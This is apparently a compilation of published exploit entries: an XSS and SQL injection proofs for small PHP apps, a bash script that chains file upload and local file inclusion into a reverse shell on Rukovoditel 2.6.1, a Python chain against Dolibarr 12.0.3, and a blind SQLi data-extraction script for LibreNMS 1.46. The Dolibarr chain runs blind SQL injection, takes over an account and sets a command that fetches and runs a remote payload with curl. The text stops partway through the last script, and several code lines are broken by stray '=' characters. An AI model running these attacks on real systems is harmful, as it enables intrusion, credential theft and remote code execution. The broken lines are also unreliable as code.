
# Exploit Title: Courier Management System 1.0 - 'First Name' Stored XSS
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application

Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on the logged in username on header and select Manage Account.
Step 3: Rename the user First Name or Last Name to
"<script>alert(1111)</script>".
Step 4: Update Profile and this will trigger the XSS.
Step 5: Logout and login again and the page will display the domain name.
            
# Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection
# Date: 2020-12-11
# Exploit Author: Piyush Malviya
# Vendor Homepage: https://www.sourcecodester.com/php/14619/supply-chain-management-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14619&title=Supply+Chain+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Tested On: Windows 10 Pro Build 18363.1256 + XAMPP V3.2.4

#Vulnerable Page: Login Page

#Exploit
Open the Application
check the URL: http://localhost/scm-master/


Open Login Page
Enter username: ' or 0=0 #
Enter password: '
Select Login Type: Admin

click on login
The SQL payload gets executed and authentication is bypassed successfully
            
# Exploit Title: Rukovoditel 2.6.1 - RCE
# Date: 2020-06-11
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c1010
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
# CVE: CVE-2020-11819

# Abort on the first failing command (long form of `set -e`).
set -o errexit

# Print the invocation summary and stop. Takes no arguments; the exit status
# is that of the preceding `cat`, i.e. 0.
function usage () {
    cat <<'USAGE'
NAME: Rukovoditel v2.6.1, RCE
SYNOPSIS: ./rce_2.6.1.sh <BASE_URL> <SID>
DESCRIPTION:
Upload file test.php on the remote server and trigger the file using a LFI
AUTHOR: coiffeur
USAGE
    exit
}

# Two positional arguments: the target base URL and a valid session id. The
# whole script runs as that already-authenticated user; nothing here bypasses
# login, so the abuse is only visible in the account's own request stream.
if [ "$#" -ne 2 ]; then
    usage
fi

BASE_URL=$1
SID=$2
echo "Setting target: $BASE_URL"
echo "Setting sid: $SID"

echo ""

# Scrape the numeric user id from the account page (the validate_form link).
echo "Extracting \$app_user['id']:"
APP_USER_ID=`curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID" | grep "validate_form&id=" | cut -d '=' -f 3 | cut -d "'" -f 1`
echo "  =>  \$app_user['id']: $APP_USER_ID"

# The timestamp is chosen by the client, not issued or bounded by the server.
echo "Setting arbitrary \$_POST['timestamp']:"
TIMESTAMP=1337
echo "  =>  \$_POST['timestamp']: 1337"

# The upload token is md5(user_id . timestamp). Both inputs are known to the
# client, so the check adds no secret; a keyed digest (HMAC with a server-side
# key) over a server-issued, short-lived timestamp would close this.
# NOTE: the trailing "=" on the next line is a transport artifact of the
# published copy (kept verbatim); the line does not run as the echo suggests.
echo "Calculating \$verifyToken:"
VERIFY_TOKEN=`echo -n "$APP_USER_ID$TIMESTAMP" | md5sum | cut -d ' ' -f 1=`
echo "  =>  \$verifyToken: $VERIFY_TOKEN"
echo ""

# Attachment upload with the forged token; test.php must exist in the cwd.
echo "[*] Trying to upload test.php ... (Arbitrary File Upload)"
curl "$BASE_URL/index.php?module=users/account&action=attachments_upload" -H "Cookie: sid=$SID" -F "timestamp=$TIMESTAMP" -F "token=$VERIFY_TOKEN" -F 'Filedata=@test.php'

echo ""

# The server's Date header gives the second in which the file was stored.
# NOTE: the "=" before "+%s" is a transport artifact of the published copy.
echo "[*] Trying to recover time() output:"
TIME=$(date -d "`curl -si "$BASE_URL" | grep "Date:" | sed 's/Date: //'`"= +%s)
echo "  =>  timestamp: $TIME"

# Stored name is sha1(time . original_name): derivable from public data.
# Unpredictable names plus storage outside the web root (or no execute
# permission on the upload tree) would break this step.
# NOTE: the trailing "=20" is a transport artifact of the published copy.
echo "[*] Trying to recover the generated filename:"=20
FILENAME=` echo -n $TIME"_test.php" | sha1sum | cut -d ' ' -f 1`
echo "  =>  filename: $FILENAME"

# Path as laid out under the install root: uploads/attachments/YYYY/MM/DD/.
echo "[*] Trying to reconstructing full path:"
DATE=`date +"%Y/%m/%d"`
FULL_PATH=`echo -n "uploads/attachments/$DATE/$FILENAME"`
echo "  =>  full path: $FULL_PATH"

echo ""

echo "[!] Prepare a netcat listener by typing: nc -lvp 4444"

echo ""

# The account's language field (fields[13]) is used as an include path; a
# traversal value points it at the uploaded file. An allow-list of language
# files server-side would reject this value.
echo "[*] Trying to update language settings  ... (Local File Inclusion)"
LANGUAGE="../../$FULL_PATH"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=$LANGUAGE"

# Any page that loads the language file now includes the upload.
# NOTE: the "=" inside the Cookie value is a transport artifact.
echo "[*] Triggering reverse shell ..."
curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID="

# Clean-up of the language field; the uploaded file itself is left behind,
# which is what a post-incident check of uploads/attachments/ should look for.
echo "[*] Restoring default language settings"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=english.php"
echo "> Done"
            
# Exploit Title: Dolibarr 12.0.3 - SQLi to RCE
# Date: 2/12/2020
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/
# Version: 12.0.3

import argparse
import binascii
import random
import re
from io import BytesIO
from urllib.parse import quote_plus as qp

import bcrypt
import pytesseract
import requests
from bs4 import BeautifulSoup
from PIL import Image

DELTA = None  # baseline seconds for one SLEEP(DELAY) probe; filled in by evaluate_delay()
DEBUG = 1  # non-zero: print progress lines
SESSION = requests.session()  # one cookie jar shared by every request in the chain
TRESHOLD = 0.80  # a probe counts as "slept" when it takes >= DELTA*TRESHOLD seconds
DELAY = 1  # seconds passed to SLEEP() inside every timing probe
LIKE = "%_subscription"  # table-name pattern used to learn the install's table prefix
COLUMNS = ["login", "pass_temp"]  # columns read from the user table by get_row()


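def usage():
    """Print the command-line synopsis to stdout and terminate with status -1.

    Called from the ``__main__`` block when any of -t/-u/-p is missing.
    The published copy carried quoted-printable soft line breaks that split
    ``<PASSWORD>`` and ``12.0.3`` across lines; the text is restored here.
    """
    banner = """NAME: Dolibarr SQLi to RCE (authenticate)
SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PASSWORD>
EXAMPLE:
    python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12.0.3/htdocs/" -u test -p test
AUTHOR: coiffeur
    """
    print(banner)
    exit(-1)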


def hex(text):
    """Return ``text`` (UTF-8 encoded) as a ``0x``-prefixed lowercase hex literal.

    Used to embed string constants in SQL without quote characters. Shadows
    the ``hex`` builtin for the rest of the module.
    """
    return "0x" + text.encode().hex()


def hash(password):
    """Return a bcrypt hash of ``password`` (fresh random salt) as text.

    Shadows the ``hash`` builtin for the rest of the module. The result is
    what change_password() sends as the ``passwordhash`` query value.
    """
    digest = bcrypt.hashpw(password.encode(), bcrypt.gensalt())
    return digest.decode()


def authenticate(url, username, password):
    """Log in through index.php on the shared SESSION.

    Returns 1 when the server answers 302 (redirect after login), else 0,
    and prints the outcome when DEBUG is set. TLS verification is disabled
    on the request, as on every request in this script.
    """
    form = {
        "actionlogin": "login",
        "loginfunction": "loginfunction",
        "username": username,
        "password": password,
    }
    response = SESSION.post(f"{url}index.php", data=form,
                            allow_redirects=False, verify=False)
    logged_in = response.status_code == 302
    if DEBUG:
        if logged_in:
            print(f"    [*] Authenticated as: {username}")
        else:
            print("[x] Authentication failed!")
    return int(logged_in)


def get_antispam_code(base_url):
    """Fetch the anti-spam image and OCR it until a 5-character code is read.

    Loops until the first OCR line is exactly 5 characters drawn from the
    image's alphabet. Side effects: each attempt writes the image to
    ``/tmp/<0-9999>`` and reads it back; the files are left behind.
    NOTE(review): the name is predictable and created with plain open()
    rather than tempfile — the usual shared-/tmp pre-creation concern.
    """
    alphabet = "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679"
    code = ""
    while len(code) != 5:
        image_bytes = SESSION.get(f"{base_url}core/antispamimage.php",
                                  verify=False).content
        temp_image = f"/tmp/{random.randint(0, 9999)}"
        with open(temp_image, "wb") as out:
            out.write(image_bytes)
        with open(temp_image, "rb") as inp:
            ocr_text = pytesseract.image_to_string(
                Image.open(BytesIO(inp.read())))
        first_line = ocr_text.split("\n")[0]
        code = first_line if all(ch in alphabet for ch in first_line) else ""
    return code


def reset_password(url, login):
    """Submit the 'forgotten password' form for ``login`` (up to 5 tries).

    Each try OCRs a fresh anti-spam image via get_antispam_code(). Returns 1
    on the first response judged successful, else 0.

    Two things to know when reading this: the success test uses
    ``str.find``, whose -1 "not found" result is truthy, so any 200 reply is
    accepted unless the phrase sits at offset 0; and the list literal below
    is split by a stray ``=`` + line break (a transport artifact of the
    published copy), so the block does not parse as printed.
    """
    for _ in range(5):
        code = get_antispam_code(url)
        headers = {
            "Referer": f"{url}user/passwordforgotten.php"
        }
        datas = {
            "action": "buildnewpassword",
            "username": login,
            "code": code
        }
        r = SESSION.post(url=f"{url}user/passwordforgotten.php",
                         data=datas, headers=headers, verify=False)
        if r.status_code == 200:
            for response in [f"Request to change password for {login} sent =
to", f"Demande de changement de mot de passe pour {login} envoy=C3=A9e"]:
                if r.text.find(response):
                    if DEBUG:
                        print(f"    [*] Password reset using code: {code}")
                    return 1
    return 0


def change_password(url, login, pass_temp):
    """Confirm the pending reset for ``login`` using its temporary password.

    Sends the validation request unauthenticated (plain ``requests``, not
    SESSION — main() clears the session cookies first) with ``passwordhash``
    set to a bcrypt hash of ``pass_temp``, the value read out of the user
    table by get_row(). A 302 is taken as success (returns 1, else 0).

    This is the escalation step: a database read of ``pass_temp`` is enough
    to complete someone else's reset, so the temporary secret should not be
    recoverable from the table (store a one-way digest). The URL literal
    below is split by a stray ``=`` + line break (transport artifact of the
    published copy) and does not parse as printed.
    """
    r = requests.get(url=f"{url}user/passwordforgotten.php?action=val=
idatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}",
                     allow_redirects=False, verify=False)
    if r.status_code == 302:
        if DEBUG:
            print(f"    [*] Password changed: {pass_temp}")
        return 1
    return 0


def change_binary(url, command, parameters):
    """Set the antivirus command and its parameters via admin/security_file.php.

    Requires an admin session on SESSION. Returns 1 when the page reports the
    record as modified (English or French wording), else 0. The other form
    fields (MAIN_UPLOAD_DOC, MAIN_UMASK) are sent with fixed values only to
    keep the form valid.

    Defender note: as trigger_exploit()'s expected responses show, the
    configured command is executed against uploaded files, so write access
    to this setting equals command execution — audit changes to it and keep
    the admin module behind strong authentication. The second string in the
    response list is split by a stray ``=`` + line break (transport
    artifact) and does not parse as printed.
    """
    headers = {
        "Referer": f"{url}admin/security_file.php"
    }
    datas = {
        "action": "updateform",
        "MAIN_UPLOAD_DOC": "2048",
        "MAIN_UMASK": "0664",
        "MAIN_ANTIVIRUS_COMMAND": command,
        "MAIN_ANTIVIRUS_PARAM": parameters
    }
    r = SESSION.post(url=f"{url}admin/security_file.php",
                     data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        for response in ["Record modified successfully", "Enregistrement mo=
difi=C3=A9 avec succ=C3=A8s"]:
            if response in r.text:
                if DEBUG:
                    print(f"    [*] Binary's path changed")
                return 1
    return 0


def trigger_exploit(url):
    """Upload a throwaway file so the configured antivirus command runs on it.

    ``junk.txt`` must exist in the current directory (FileNotFoundError
    otherwise) and the handle opened for it is never closed. Returns 1 when
    the page reports either a successful upload or an antivirus validation
    failure — both mean the command was invoked — else 0. The response
    strings below are split by stray ``=`` + line breaks (transport
    artifact) and do not parse as printed.
    """
    headers = {
        "Referer": f"{url}admin/security_file.php"
    }
    files = {
        "userfile[]": open("junk.txt", "rb"),
    }
    datas = {
        "sendit": "Upload"
    }
    if DEBUG:
        print(f"    [*] Triggering reverse shell")
    r = SESSION.post(url=f"{url}admin/security_file.php",
                     files=files, data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        for response in ["File(s) uploaded successfully", "The antivirus pr=
ogram was not able to validate the file (file might be infected by a virus)=
", "Fichier(s) t=C3=A9l=C3=A9vers=C3=A9s(s) avec succ=C3=A8s", "L'antivirus=
 n'a pas pu valider ce fichier (il est probablement infect=C3=A9 par un vir=
us) !"]:
            if response in r.text:
                if DEBUG:
                    print(f"    [*] Exploit done")
                return 1
    return 0


def get_version(url):
    """Scrape the version banner from index.php and report whether it is 12.0.3.

    Returns 1 when a "Version Dolibarr x.y.z" match contains "12.0.3", else
    0. Informational only: main() discards the result. The dots in the
    pattern are unescaped and so match any character.
    """
    page = SESSION.get(f"{url}index.php", verify=False).text
    matches = re.findall(
        r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", page)
    if matches and "12.0.3" in matches[0]:
        if DEBUG:
            print(f"    [*] {matches[0]} (exploit should work)")
        return 1
    if DEBUG:
        print("[*] Version may not be vulnerable")
    return 0


def get_privileges(url):
    """Heuristically check that the session can read customer orders.

    Takes the first ``id=<digit>`` match from index.php (one digit only, so
    ids >= 10 are truncated), opens user/perms.php with it, and inspects the
    cells around every status image titled "Actif"/"Active". Returns 1 when
    the "Read customers orders" permission is found, else 0; main() only
    prints the result and does not act on it.

    ``privilege in td`` tests membership among the Tag's direct children,
    not a substring of its text — presumably stricter than intended;
    verify. Two string literals below are split by stray ``=`` + line
    breaks (transport artifact of the published copy) and do not parse as
    printed.
    """
    r = SESSION.get(f"{url}index.php", verify=False)
    x = re.findall(r"id=\d", r.text)
    if x:
        id = x[0]
        if DEBUG:
            print(f"    [*] id found: {id}")
        r = SESSION.get(f"{url}user/perms.php?{id}", verify=False)
        soup = BeautifulSoup(r.text, 'html.parser')
        for img in soup.find_all("img"):
            if img.get("title") in ["Actif", "Active"]:
                for td in img.parent.parent.find_all("td"):
                    privileges = [
                        "Consulter les commandes clients", "Read customers =
orders"]
                    for privilege in privileges:
                        if privilege in td:
                            if DEBUG:
                                print(
                                    f"    [*] Check privileges: {privilege}=
")
                            return 1
    if DEBUG:
        print(f"[*] At the sight of the privileges, the exploit may fail")
    return 0


def check(url, payload):
    """POST ``payload`` as ``object_status`` to the order-statistics page.

    Returns the response time in seconds; this is the timing oracle every
    probe in the script is built on. Server-side, each call is one POST to
    commande/stats/index.php carrying SQL in ``object_status``.
    """
    stats_page = f"{url}commande/stats/index.php"
    response = SESSION.post(
        url=stats_page,
        data={"object_status": payload},
        headers={"Referer": f"{stats_page}?leftmenu=orders"},
        verify=False,
    )
    return response.elapsed.total_seconds()


def evaluate_delay(url):
    """Calibrate the timing oracle.

    Sets the module-level DELTA to the mean response time, over four probes,
    of a payload that always sleeps DELAY seconds; later probes are judged
    against DELTA*TRESHOLD.
    """
    global DELTA
    always_sleep = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"
    samples = [check(url, always_sleep) for _ in range(4)]
    DELTA = sum(samples) / len(samples)
    if DEBUG:
        print(f"    [+] Delta: {DELTA}")


def get_tbl_name_len(url):
    """Find the length of the first table name matching LIKE by timing.

    Linear search: probe i asks "length > i?" and sleeps DELAY seconds when
    that is false, so the first probe taking >= DELTA*TRESHOLD seconds gives
    the length. Gives up with exit(-1) once i exceeds 100. ``hex`` is the
    module helper (0x… literal), not the builtin. The f-string below is
    split by a stray ``=`` + line break (transport artifact of the
    published copy) and does not parse as printed.

    Visibility: up to ~100 POSTs to commande/stats/index.php, each carrying
    SLEEP() in ``object_status`` and most taking ~DELAY seconds — a pattern
    a slow-query log or WAF rule on that parameter can flag.
    """
    i = 0
    while 1:
        payload = f"IF((SELECT LENGTH(table_name) FROM information_schema=
.tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))"
        if check(url, payload) >= DELTA*TRESHOLD:
            return i
        if i > 100:
            print(f"[x] Exploit failed")
            exit(-1)
        i += 1


def get_tbl_name(url, length):
    """Recover ``length`` characters of the table name matching LIKE.

    For each position the ASCII code is binary-searched in [0, 126] with
    probes of the form "code <= mid ? SLEEP(DELAY) : SLEEP(0)", i.e. seven
    timed requests per character. ``min``/``max`` shadow the builtins inside
    the loop only. One mis-timed response mis-decodes a character; there is
    no retry or verification. The f-string below is split by stray ``=`` +
    line breaks (transport artifact of the published copy) and does not
    parse as printed.
    """
    tbl_name = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM i=
nformation_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP=
({DELAY}), SLEEP(0))"
            if check(url, payload) >= DELTA*TRESHOLD:
                max = mid
            else:
                min = mid + 1
        tbl_name += chr(min)
    return tbl_name


def get_elt_len(url, tbl_name, column_name):
    """Find the length of ``column_name`` in the first row of ``tbl_name``.

    Same linear timing search as get_tbl_name_len(), bounded at 100.
    ``tbl_name`` and ``column_name`` are interpolated unquoted; in this
    script they come from COLUMNS and the recovered prefix, not from user
    input. The f-string below is split by a stray ``=`` + line break
    (transport artifact of the published copy) and does not parse as
    printed.
    """
    i = 0
    while 1:
        payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMI=
T 1)>{i}, SLEEP(0), SLEEP({DELAY}))"
        if check(url, payload) >= DELTA*TRESHOLD:
            return i
        if i > 100:
            print(f"[x] Exploit failed")
            exit(-1)
        i += 1


def get_elt(url, tbl_name, column_name, length):
    """Recover ``length`` characters of ``column_name`` from the first row.

    Same seven-probe binary search per character as get_tbl_name(), with
    the same no-retry caveat. ``min``/``max`` shadow the builtins inside
    the loop only. The f-string below is split by a stray ``=`` + line
    break (transport artifact of the published copy) and does not parse as
    printed.
    """
    elt = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FRO=
M {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))"
            if check(url, payload) >= DELTA*TRESHOLD:
                max = mid
            else:
                min = mid + 1
        elt += chr(min)
    return elt


def get_row(url, tbl_name):
    """Read every COLUMNS entry of the first row (LIMIT 1) of ``tbl_name``.

    Returns ``{column_name: value}``. The "admin" in the progress message
    is an assumption: the row is whichever one the database returns first
    for that table — TODO confirm against the target's row order. The
    ``get_elt`` call below is split by a stray ``=`` + line break
    (transport artifact of the published copy) and does not parse as
    printed.
    """
    print(f"    [*] Dump admin's infos from {tbl_name}")
    infos = {}
    for column_name in COLUMNS:
        elt_length = get_elt_len(url, tbl_name, column_name)
        infos[column_name] = get_elt(url, tbl_name, column_name, elt_leng=
th)
    if DEBUG:
        print(f"    [+] Infos: {infos}")
    return infos


def main(url, username, password):
    """Run the full chain starting from an ordinary authenticated account.

    Stages, each observable server-side: (1) login; (2) version and
    permission checks — printed only, their return values are ignored;
    (3) timing calibration; (4) time-based blind SQLi through the
    order-statistics page to learn the table prefix and read ``login`` and
    ``pass_temp`` of the first user row; (5) request a password reset for
    that login, re-read ``pass_temp``, confirm the reset unauthenticated and
    log in as that user; (6) set the antivirus command in
    admin/security_file.php and upload a file so it runs. Exits -1 at the
    first failed stage; always returns 0 otherwise. The change_binary()
    call is split by a stray ``=`` + line break (transport artifact of the
    published copy) and does not parse as printed.
    """
    # Check if exploit is possible
    print(f"[*] Requirements:")
    if not authenticate(url, username, password):
        print(f"[x] Exploit failed!")
        exit(-1)
    get_version(url)
    get_privileges(url)

    print(f"\n[*] Starting exploit:")
    # Evaluate delay
    evaluate_delay(url)
    print(f"    [*] Extract prefix (using table: {LIKE})")
    tbl_name_len = get_tbl_name_len(url)
    tbl_name = get_tbl_name(url, tbl_name_len)
    # The prefix is everything before the first underscore of the recovered name.
    prefix = f"{tbl_name.split('_')[0]}_"
    if DEBUG:
        print(f"    [+] Prefix: {prefix}")

    # Dump the first user row (login + pass_temp)
    user_table_name = f"{prefix}user"
    infos = get_row(url, user_table_name)
    if not infos["login"]:
        print(f"[x] Exploit failed!")
        exit(-1)

    # Reset that user's password, then read the freshly generated pass_temp
    if DEBUG:
        print(f"    [*] Reseting {infos['login']}'s password")
    if not reset_password(url, infos["login"]):
        print(f"[x] Exploit failed!")
        exit(-1)
    infos = get_row(url, user_table_name)

    # Remove cookies to logout
    # Change admin's password
    # Login as admin
    SESSION.cookies.clear()
    if not change_password(url, infos['login'], infos['pass_temp']):
        print(f"[x] Exploit failed!")
        exit(-1)
    authenticate(url, infos['login'], infos['pass_temp'])

    # Change antivirus's binary path
    # Trigger reverse shell
    change_binary(url, "bash", '-c "$(curl http://127.0.0.1:8000/poc.txt)"'=
)
    trigger_exploit(url)
    return 0


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", help="Base URL of Dolibarr")
    parser.add_argument("-u", help="Username")
    parser.add_argument("-p", help="Password")
    args = parser.parse_args()

    # None of the options is marked required on purpose: a missing or empty
    # value falls through to usage() and its banner rather than argparse's
    # own error message.
    if not all((args.t, args.u, args.p)):
        usage()

    main(args.t, args.u, args.p)
            
# Exploit Title: Courier Management System 1.0 - 'MULTIPART street ' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application

Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form  , click on save
Step 5. Capture the request to the "/ajax.php?action=save_branch" page in Burp Suite
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all database contents

---
Parameter: MULTIPART street ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="id"


-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="street"

11111111111' AND (SELECT 8687 FROM (SELECT(SLEEP(5)))XZFt) AND 'OQNu'='OQNu
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="city"

111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="state"

1111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="zip_code"

11111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="country"

1111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="contact"

111111111
-----------------------------12317926718649295872939507245--
---
            
# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
# Google Dork: Unknown
# Date: 13-12-2020
# Exploit Author: Hodorsec
# Vendor Homepage: https://www.librenms.org
# Software Link: https://github.com/librenms/librenms
# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838
# Version: 1.46
# Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch
# CVE : N/A

#!/usr/bin/python3

# EXAMPLE:
# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2
# [*] Checking if authentication for page is required...
# [*] Visiting page to retrieve initial token and cookies...
# [*] Retrieving authenticated cookie...
# [*] Printing number of rows in table...
# 1
# [*] Found 1 rows of data in table 'users'
#
# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table...
# [*] Extracting strings from row 1...
# librenms
# [*] Retrieved value 'librenKs' for column 'username' in row 1
# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table...
# [*] Extracting strings from row 1...
# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr
# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1
#
# [+] Done!

import requests
import urllib3
import os
import sys
import re
from bs4 import BeautifulSoup

# Optionally, use a proxy
# proxy = "http://<user>:<pass>@<proxy>:<port>"
proxy = ""
# Set every variant requests/urllib honour; an empty value means "no proxy".
os.environ.update(dict.fromkeys(
    ("http_proxy", "HTTP_PROXY", "https_proxy", "HTTPS_PROXY"), proxy))

# Disable cert warnings (every request below is sent with verify=False)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Per-request timeout in seconds, passed to each requests call
timeout = 10

# Injection prefix and suffix wrapped around every timing probe
inj_prefix = "(select(sleep("
inj_suffix = ")))))"

# Search ranges: ASCII '0'..'9' for the row count, printable ASCII for data
dec_begin, dec_end = 48, 57
ascii_begin, ascii_end = 32, 126

# Handle CTRL-C
def keyboard_interrupt():
    """Report a user-requested interrupt on stdout and exit with status 0."""
    message = "\n\n[*] User requested an interrupt, exiting..."
    print(message)
    exit(0)

# Custom headers
def http_headers():
    """Return the fixed request headers used by every call (User-Agent only).

    A fresh dict is built on each call so callers may mutate it freely.
    """
    return {'User-Agent': 'Mozilla'}

def check_auth(url,headers):
    """Return True when an anonymous GET of ``/graph.php`` answers "Unauthorized".

    Uses the module-level ``timeout`` and disables TLS verification.
    """
    print("[*] Checking if authentication for page is required...")
    response = requests.get(url + "/graph.php", headers=headers,
                            timeout=timeout, verify=False)
    return "Unauthorized" in response.text

def get_initial_token_and_cookies(url,headers):
    """Load ``/login`` and return ``(csrf_token, cookies)``.

    Only the FIRST ``<input>`` on the page is inspected: its value is
    returned when it is named ``_token``, otherwise ``(None, cookies)``.
    A page without any ``<input>`` falls through and yields ``None`` (not a
    tuple), which the caller's unpacking turns into a TypeError. Raises
    KeyError when that first input has no ``name`` attribute.
    """
    print("[*] Visiting page to retrieve initial token and cookies...")
    response = requests.get(url + "/login", headers=headers,
                            timeout=timeout, verify=False)
    inputs = BeautifulSoup(response.text, 'html.parser')('input')
    if not inputs:
        return None
    first = inputs[0]
    if first['name'] == "_token":
        return first['value'], response.cookies
    return None, response.cookies

def get_valid_cookie(url,headers,token,cookies,usern,passw):
    """POST the credentials to ``/login`` and return the authenticated cookies.

    Success is judged by the "Overview | LibreNMS" page title in the reply;
    anything else prints a message and exits with -1. Note the credentials
    travel with ``verify=False``, i.e. without TLS validation.
    """
    print("[*] Retrieving authenticated cookie...")
    form = {
        '_token': token,
        'username': usern,
        'password': passw,
        'submit': '',
    }
    response = requests.post(url + "/login", data=form, headers=headers,
                             cookies=cookies, timeout=timeout, verify=False)
    if "Overview | LibreNMS" not in response.text:
        print("[!] No valid response from used session, exiting!\n")
        exit(-1)
    return response.cookies

# Perform the SQLi call for injection
def sqli(url,headers,cookies,inj_str,sleep):
    """Send one timing probe in the ``sort`` parameter and report whether it slept.

    Spaces in ``inj_str`` are rewritten as ``/**/`` first. The query string
    is assembled by hand and handed to requests as one string, so nothing
    in it is URL-encoded (presumably deliberate — verify). Returns True when
    the response took at least ``sleep`` seconds, False otherwise; the final
    branch is unreachable for ordinary float timings.
    """
    probe = inj_str.replace(" ", "/**/")
    query = "&".join(f"{key}={value}" for key, value in {
        'id': '1',
        'stat': 'none',
        'type': 'port_mac_acc_total',
        'sort': probe,
        'debug': '1',
    }.items())
    # Do GET request
    response = requests.get(url, params=query, headers=headers,
                            cookies=cookies, timeout=timeout, verify=False)
    elapsed = response.elapsed.total_seconds()
    if elapsed >= sleep:
        return True
    if elapsed < sleep:
        return False
    print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
    exit(-1)

# Extract rows
def get_rows(url,headers,cookies,table,sleep):
    """Recover COUNT(*) of ``table`` one decimal digit at a time (at most 4 digits).

    For each digit position one probe tests whether a digit exists there at
    all, then up to ten probes test '0'..'9' for equality; a probe "hits"
    when the response takes >= ``sleep`` seconds. Each digit is echoed as it
    is found. Returns the count as int, or False when nothing was recovered.

    The second ``inj_str`` assignment below contains ``"=+`` — a transport
    artifact of the published copy — and does not parse as printed.
    """
    rows = ""
    max_pos_rows = 4
    # Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc.
    for pos in range(1,max_pos_rows+1):
        # Test if current pos does have any valid value. If not, break
        direction = ">"
        inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix
        if not sqli(url,headers,cookies,inj_str,sleep):
            break
        # Loop decimals
        direction = "="
        for num_rows in range(dec_begin,dec_end+1):
            row_char = chr(num_rows)
            inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix
            if sqli(url,headers,cookies,inj_str,sleep):
                rows += row_char
                print(row_char,end='',flush=True)
                break
    if rows != "":
        print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
        return int(rows)
    else:
        return False

# Loop through positions and characters
def get_data(url,headers,cookies,row,column,table,sleep):
    """Recover the value of ``column`` in the ``row``-th row of ``table``.

    Positions 1..49 only (``range(1, max_pos_len)`` stops one short of 50):
    a first probe checks that a printable character exists at the position,
    then every printable ASCII code 32..126 is tried for equality — up to
    ~96 timed requests per character, each ``sleep`` seconds when it hits.
